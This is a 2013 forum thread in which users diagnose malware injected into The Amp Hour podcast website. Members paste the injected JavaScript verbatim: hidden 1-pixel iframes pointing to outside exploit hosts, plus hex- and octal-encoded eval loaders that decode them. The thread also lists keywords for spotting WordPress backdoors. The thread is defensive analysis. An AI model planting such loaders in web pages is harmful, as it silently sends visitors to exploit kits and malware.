Author Topic: The Amp hour Site, NOD32 Trojan message  (Read 6516 times)

0 Members and 1 Guest are viewing this topic.

Offline blackdog

  • Frequent Contributor
  • **
  • Posts: 580
  • Country: nl
  • Please stop pushing bullshit...
The Amp hour Site, NOD32 Trojan message
« on: March 05, 2013, 04:53:00 pm »
Hi
When i try to visit the Amp Hour site i see a trojan message from my AntiVirus software (NOD32)
Anyone els have this problem?

Kind regarts
Blackdog
“Two things are infinite, the universe and human stupidity, and I am not yet completely sure about the universe.”
 

Offline TerminalJack505

  • Super Contributor
  • ***
  • Posts: 1205
  • Country: 00
Re: The Amp hour Site, NOD32 Trojan message
« Reply #1 on: March 05, 2013, 04:58:53 pm »
The last time I visited I got a message regarding a missing plug-in.  I checked to see which plug-in it was and it was Java.  I thought that was pretty suspicious. 

I'm not sure why that particular site would be using any Java applets.  Of course Java is plagued with security vulnerabilities.
 

Online mariush

  • Super Contributor
  • ***
  • Posts: 3814
  • Country: ro
  • .
Re: The Amp hour Site, NOD32 Trojan message
« Reply #2 on: March 05, 2013, 05:02:04 pm »
Indeed, I also got a request to load Java plugin, which these days doesn't sound like a good idea.

Virustotal confirms something's fishy :

https://www.virustotal.com/en/file/6f77869559979c2d7a0b430071b94d97e8f99504304b3a5fd61a219f44ac00c3/analysis/1362502792/


Avast    JS:Redirector-AHD [Trj]    20130305
BitDefender    JS:Trojan.JS.Redirector.BQ    20130305
F-Secure    JS:Trojan.JS.Redirector.BQ    20130305
Fortinet    JS/Iframe.W!tr    20130305
GData    JS:Trojan.JS.Redirector.BQ    20130305
McAfee-GW-Edition    Heuristic.BehavesLike.JS.Infected.A    20130305
MicroWorld-eScan    JS:Trojan.JS.Redirector.BQ    20130305
nProtect    JS:Trojan.JS.Redirector.BQ    20130305
VIPRE    Trojan.JS.Obfuscator.aa (v)    20130305
 

Offline robrenz

  • Super Contributor
  • ***
  • Posts: 3035
  • Country: us
  • Real Machinist, Wannabe EE
Re: The Amp hour Site, NOD32 Trojan message
« Reply #3 on: March 05, 2013, 05:05:08 pm »
I just listened to the Amp hour 4 hours ago and I got no messages from my virus software and was not asked to load anything.  I just tried again now and same result, no problems.

Offline justanothercanuck

  • Frequent Contributor
  • **
  • Posts: 390
  • Country: ca
  • Doing retro repairs...
Re: The Amp hour Site, NOD32 Trojan message
« Reply #4 on: March 05, 2013, 05:13:16 pm »
Another script that got slipped into the site code...

Code: [Select]
<div id="ujck">
<iframe src="http:// fres. edomena .pl/ esd. php" style="position: absolute; border: 0px none; height: 1px; width: 1px; left: 1px; top: 1px;">
</div>
« Last Edit: March 05, 2013, 05:16:30 pm by justanothercanuck »
Maintain your old electronics!  If you don't preserve it, it could be lost forever!
 

Online PA0PBZ

  • Super Contributor
  • ***
  • Posts: 4137
  • Country: nl
Re: The Amp hour Site, NOD32 Trojan message
« Reply #5 on: March 05, 2013, 06:13:09 pm »
 :--

Code: [Select]
(function() {
    var ujck = document.createElement('iframe');

    ujck.src = 'http://fres.edomena.pl/esd.php';
    ujck.style.position = 'absolute';
    ujck.style.border = '0';
    ujck.style.height = '1px';
    ujck.style.width = '1px';
    ujck.style.left = '1px';
    ujck.style.top = '1px';

    if (!document.getElementById('ujck')) {
        document.write('<div id=\'ujck\'></div>');
        document.getElementById('ujck').appendChild(ujck);
    }
})();
Keyboard error: Press F1 to continue.
 

Online PA0PBZ

  • Super Contributor
  • ***
  • Posts: 4137
  • Country: nl
Re: The Amp hour Site, NOD32 Trojan message
« Reply #6 on: March 05, 2013, 06:24:39 pm »
Also, I don't like these things on a web page:

Code: [Select]
  asgq = [0x28, 0x66, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x28, 0x29, 0x20, 0x7b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x76,
0x61, 0x72, 0x20, 0x75, 0x6a, 0x63, 0x6b, 0x20, 0x3d, 0x20, 0x64, 0x6f, 0x63, 0x75, 0x6d, 0x65, 0x6e, 0x74, 0x2e, 0x63, 0x72, 0x65, 0x61,
0x74, 0x65, 0x45, 0x6c, 0x65, 0x6d, 0x65, 0x6e, 0x74, 0x28, 0x27, 0x69, 0x66, 0x72, 0x61, 0x6d, 0x65, 0x27, 0x29, 0x3b, 0xd, 0xa, 0xd, 0xa,
0x20, 0x20, 0x20, 0x20, 0x75, 0x6a, 0x63, 0x6b, 0x2e, 0x73, 0x72, 0x63, 0x20, 0x3d, 0x20, 0x27, 0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f,
0x66, 0x72, 0x65, 0x73, 0x2e, 0x65, 0x64, 0x6f, 0x6d, 0x65, 0x6e, 0x61, 0x2e, 0x70, 0x6c, 0x2f, 0x65, 0x73, 0x64, 0x2e, 0x70, 0x68, 0x70,
0x27, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x6a, 0x63, 0x6b, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e, 0x70, 0x6f, 0x73, 0x69,
0x74, 0x69, 0x6f, 0x6e, 0x20, 0x3d, 0x20, 0x27, 0x61, 0x62, 0x73, 0x6f, 0x6c, 0x75, 0x74, 0x65, 0x27, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20,
0x20, 0x75, 0x6a, 0x63, 0x6b, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e, 0x62, 0x6f, 0x72, 0x64, 0x65, 0x72, 0x20, 0x3d, 0x20, 0x27, 0x30,
0x27, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x6a, 0x63, 0x6b, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e, 0x68, 0x65, 0x69, 0x67,
0x68, 0x74, 0x20, 0x3d, 0x20, 0x27, 0x31, 0x70, 0x78, 0x27, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x6a, 0x63, 0x6b, 0x2e, 0x73,
0x74, 0x79, 0x6c, 0x65, 0x2e, 0x77, 0x69, 0x64, 0x74, 0x68, 0x20, 0x3d, 0x20, 0x27, 0x31, 0x70, 0x78, 0x27, 0x3b, 0xd, 0xa, 0x20, 0x20,
0x20, 0x20, 0x75, 0x6a, 0x63, 0x6b, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e, 0x6c, 0x65, 0x66, 0x74, 0x20, 0x3d, 0x20, 0x27, 0x31, 0x70,
0x78, 0x27, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x6a, 0x63, 0x6b, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e, 0x74, 0x6f, 0x70,
0x20, 0x3d, 0x20, 0x27, 0x31, 0x70, 0x78, 0x27, 0x3b, 0xd, 0xa, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x69, 0x66, 0x20, 0x28, 0x21, 0x64, 0x6f,
0x63, 0x75, 0x6d, 0x65, 0x6e, 0x74, 0x2e, 0x67, 0x65, 0x74, 0x45, 0x6c, 0x65, 0x6d, 0x65, 0x6e, 0x74, 0x42, 0x79, 0x49, 0x64, 0x28, 0x27,
0x75, 0x6a, 0x63, 0x6b, 0x27, 0x29, 0x29, 0x20, 0x7b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x64, 0x6f, 0x63, 0x75,
0x6d, 0x65, 0x6e, 0x74, 0x2e, 0x77, 0x72, 0x69, 0x74, 0x65, 0x28, 0x27, 0x3c, 0x64, 0x69, 0x76, 0x20, 0x69, 0x64, 0x3d, 0x5c, 0x27, 0x75,
0x6a, 0x63, 0x6b, 0x5c, 0x27, 0x3e, 0x3c, 0x2f, 0x64, 0x69, 0x76, 0x3e, 0x27, 0x29, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x64, 0x6f, 0x63, 0x75, 0x6d, 0x65, 0x6e, 0x74, 0x2e, 0x67, 0x65, 0x74, 0x45, 0x6c, 0x65, 0x6d, 0x65, 0x6e, 0x74, 0x42, 0x79,
0x49, 0x64, 0x28, 0x27, 0x75, 0x6a, 0x63, 0x6b, 0x27, 0x29, 0x2e, 0x61, 0x70, 0x70, 0x65, 0x6e, 0x64, 0x43, 0x68, 0x69, 0x6c, 0x64, 0x28,
0x75, 0x6a, 0x63, 0x6b, 0x29, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x7d, 0xd, 0xa, 0x7d, 0x29, 0x28, 0x29, 0x3b];
                                                                                                                                                                                                                   
try {
   document.body |= 1
   } catch (gdsgsdg) {
   zz = 3;
   dbshre = 159;
   if (dbshre) {
      vfvwe = 0;
      try {} catch (agdsg) {
         vfvwe = 1;
   }
   if (!vfvwe) {
      e = window["eval"];
   }
   s = "";
   for (i = 0; i - 480 != 0; i++) {
      if (window.document) s += String.fromCharCode(asgq[i]);
   }
   z = s;
   e(s);
   }
 }
   //@ sourceURL=/inline-128596b04ba.js


 :palm:
Keyboard error: Press F1 to continue.
 

Offline gnif

  • Administrator
  • *****
  • Posts: 1114
  • Country: au
Re: The Amp hour Site, NOD32 Trojan message
« Reply #7 on: March 07, 2013, 08:02:32 am »
Sigh, another compromised site... possibly via a third party plugin, or a theme running an old version of timthumb.php, or just an old version of the site. Windows users should keep away from the site until it has been cleaned as this attack is targeting windows machines.
HostFission - Full Server Monitoring and Management Solutions.
https://hostfission.com/
https://twitter.com/HostFission

I volunteer my time to manage this server, if you would like to support this work I have a patreon here:
https://www.patreon.com/gnif
 

Offline mrflibble

  • Super Contributor
  • ***
  • Posts: 1947
  • Country: nl
Re: The Amp hour Site, NOD32 Trojan message
« Reply #8 on: March 07, 2013, 03:28:10 pm »
Also, I don't like these things on a web page:

Code: [Select]
  asgq = [0x28, 0x66, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x28, 0x29, 0x20, 0x7b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x76,
...

That asgq thing is yet another iframe:
Code: [Select]
...
    cgohp.src = 'http://mures-goldis.ro/clik.php';
...

I was expecting something worse. :P
 

Offline FrozenHaxor

  • Contributor
  • Posts: 29
  • Country: pl
    • My random stuff
Re: The Amp hour Site, NOD32 Trojan message
« Reply #9 on: March 11, 2013, 01:48:17 pm »
I had this problem once. It's a local PC virus  that searches for FileZilla and other FTP applications' saved FTP data.

The virus sends the data to some Indian Nigerian scam center and they add a slice of malicious code to the end of every page's code...

I recommend changing every login info and scanning entire PC.
 

Offline gnif

  • Administrator
  • *****
  • Posts: 1114
  • Country: au
Re: The Amp hour Site, NOD32 Trojan message
« Reply #10 on: March 12, 2013, 06:44:35 am »
I had this problem once. It's a local PC virus  that searches for FileZilla and other FTP applications' saved FTP data.

The virus sends the data to some Indian Nigerian scam center and they add a slice of malicious code to the end of every page's code...

I recommend changing every login info and scanning entire PC.

No, it is not, the site has had some code injected into it, this is a server side issue, I deal with these often and they are usually caused by a script kiddy that has infected old versions of sites using wordpress, the old version timthumb image resize script, or poorly written plugins.

If it was client side, you would be the only one reporting it, and I would not be able to see the injected code on my clean Linux machine.
HostFission - Full Server Monitoring and Management Solutions.
https://hostfission.com/
https://twitter.com/HostFission

I volunteer my time to manage this server, if you would like to support this work I have a patreon here:
https://www.patreon.com/gnif
 

Offline baljemmett

  • Supporter
  • ****
  • Posts: 666
  • Country: gb
Re: The Amp hour Site, NOD32 Trojan message
« Reply #11 on: March 12, 2013, 06:13:08 pm »
I had this problem once. It's a local PC virus  that searches for FileZilla and other FTP applications' saved FTP data.

No, it is not, the site has had some code injected into it, this is a server side issue, [...] If it was client side, you would be the only one reporting it, and I would not be able to see the injected code on my clean Linux machine.

I think FrozenHaxor was suggesting an infection vector, rather than that the malicious code was being injected locally.  As I recall, a little while back both the Amp Hour site and parts of this site were hit by something like this* at the same time, despite apparently being on separate servers -- given that, a decent sweep of any and all machines from which Dave accesses the sites would indeed be prudent.  I think it was mentioned at the time, though, so hopefully Dave did exactly that!  Of course, making sure the sites themselves are up-to-date regarding known vulnerabilities should be a given...


* Some redirects in .htaccess, I seem to recall, that was directing traffic to a server that mostly returned 'ok' but sometimes returned unpleasant grotware.
 

Offline Nermash

  • Frequent Contributor
  • **
  • Posts: 256
Re: The Amp hour Site, NOD32 Trojan message
« Reply #12 on: March 13, 2013, 07:28:16 am »
I just got Reveton trojan when trying to download AmpHour mp3. There was also a popup asking to run some crap when I started the stream. Some lame ass has taken control of the site, be carefull!

Update: It looks OK now, I am not able to reproduce the infection again.
« Last Edit: March 13, 2013, 07:41:22 am by Nermash »
 

Offline justanothercanuck

  • Frequent Contributor
  • **
  • Posts: 390
  • Country: ca
  • Doing retro repairs...
Re: The Amp hour Site, NOD32 Trojan message
« Reply #13 on: March 13, 2013, 09:31:32 am »
No, it's still there...  Same BS as before.  It doesn't trigger all the time, there has to be some requirements met before it pushes the java and acrobat exploits...  That's why sometimes you see "ok" and other times you get the viruses.

Code: [Select]
<script type="text/rocketscript" language="javascript" >ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0165,0144,0151,0155,0146,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0165,0144,0151,0155,0146,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0145,0166,0145,0162,0167,0157,0162,0170,056,0144,0145,057,0145,0163,0144,056,0160,0150,0160,047,073,015,012,040,040,040,040,0165,0144,0151,0155,0146,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0165,0144,0151,0155,0146,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0165,0144,0151,0155,0146,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0165,0144,0151,0155,0146,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0165,0144,0151,0155,0146,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0165,0144,0151,0155,0146,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0165,0144,0151,0155,0146,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0165,0144,0151,0155,0146,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0165,0144,0151,0155,0146,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0165,0144,0151,0155,0146,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i 488!=0;i =1){j=i;if((031==0x19))if(e)s=s ff(w[j]);}xz=e;if(v)xz(s)}</script>
Code: [Select]
(function() {
    var udimf = document.createElement('iframe');

    udimf.src = 'http:// ever worx .de/ esd .php';
    udimf.style.position = 'absolute';
    udimf.style.border = '0';
    udimf.style.height = '1px';
    udimf.style.width = '1px';
    udimf.style.left = '1px';
    udimf.style.top = '1px';

    if (!document.getElementById('udimf')) {
        document.write('<div id=\'udimf\'></div>');
        document.getElementById('udimf').appendChild(udimf);
    }
})();
« Last Edit: March 13, 2013, 11:08:17 am by justanothercanuck »
Maintain your old electronics!  If you don't preserve it, it could be lost forever!
 

Offline ChrisGammell

  • Supporter
  • ****
  • Posts: 157
    • Chris Gammell's Analog Life
Re: The Amp hour Site, NOD32 Trojan message
« Reply #14 on: March 13, 2013, 01:57:52 pm »
As for "triggers", it usually is dependent on how you get to the site. Code I've found and cleaned out has prioritized people that find the site by search engines vs people that visit it directly; the idea being that if it doesn't happen to me when I go to the site, it will take longer to catch.

I've been hunting this damn thing down and killing it for weeks (as I found it, there was usually some lag). Now I actually have some software on the backend that detects when things are changed and it's looking specifically for malware (using the Sucuri plugin and monitoring site).

The real problem, as alluded to above, is that there was a backdoor placed at some time in the past. Obviously I have not found it yet. I've updated and scanned damn near everything. My fear is that it's somehow embedded in the database, which would be bad. I can't promise I'll act on all suggestions, but they are appreciated for sure.

I think my next step is to start from scratch, but I can't even imagine how many things that will break.
 

Offline mrflibble

  • Super Contributor
  • ***
  • Posts: 1947
  • Country: nl
Re: The Amp hour Site, NOD32 Trojan message
« Reply #15 on: March 13, 2013, 02:21:29 pm »
My fear is that it's somehow embedded in the database, which would be bad. I can't promise I'll act on all suggestions, but they are appreciated for sure.

Assuming that is the case ... export database, validate & sanitize fields, import sanitized database into a fresh trusted install. That is also assuming the cost for doing the fresh install is low, because you have an image somewhere. The database is where the pain is. Again assuming that the dbase content being compromised is a large part of your problem.
 

Offline gnif

  • Administrator
  • *****
  • Posts: 1114
  • Country: au
Re: The Amp hour Site, NOD32 Trojan message
« Reply #16 on: March 16, 2013, 08:51:19 am »
As for "triggers", it usually is dependent on how you get to the site. Code I've found and cleaned out has prioritized people that find the site by search engines vs people that visit it directly; the idea being that if it doesn't happen to me when I go to the site, it will take longer to catch.

I've been hunting this damn thing down and killing it for weeks (as I found it, there was usually some lag). Now I actually have some software on the backend that detects when things are changed and it's looking specifically for malware (using the Sucuri plugin and monitoring site).

The real problem, as alluded to above, is that there was a backdoor placed at some time in the past. Obviously I have not found it yet. I've updated and scanned damn near everything. My fear is that it's somehow embedded in the database, which would be bad. I can't promise I'll act on all suggestions, but they are appreciated for sure.

I think my next step is to start from scratch, but I can't even imagine how many things that will break.

I have seen it exhibit as a word press plugin before also, look for strange plugins that look like they are part of the app you are using. Simple quick way to check for wordpress is to check wp_plugins in the database for code that contains eval/base64_/shell_exec/passthru/exec/system and finally look for preg_* functions that are being called with '\e' in the pattern (most stupid 'feature' EVER).
HostFission - Full Server Monitoring and Management Solutions.
https://hostfission.com/
https://twitter.com/HostFission

I volunteer my time to manage this server, if you would like to support this work I have a patreon here:
https://www.patreon.com/gnif
 

Offline SeanB

  • Super Contributor
  • ***
  • Posts: 15122
  • Country: za
Re: The Amp hour Site, NOD32 Trojan message
« Reply #17 on: April 04, 2013, 06:59:56 pm »
Just look at the current issue of Security now, describes Dave's issues to a "T".

http://twit.tv/show/security-now/398

and listen/watch it
 


Share me

Digg  Facebook  SlashDot  Delicious  Technorati  Twitter  Google  Yahoo
Smf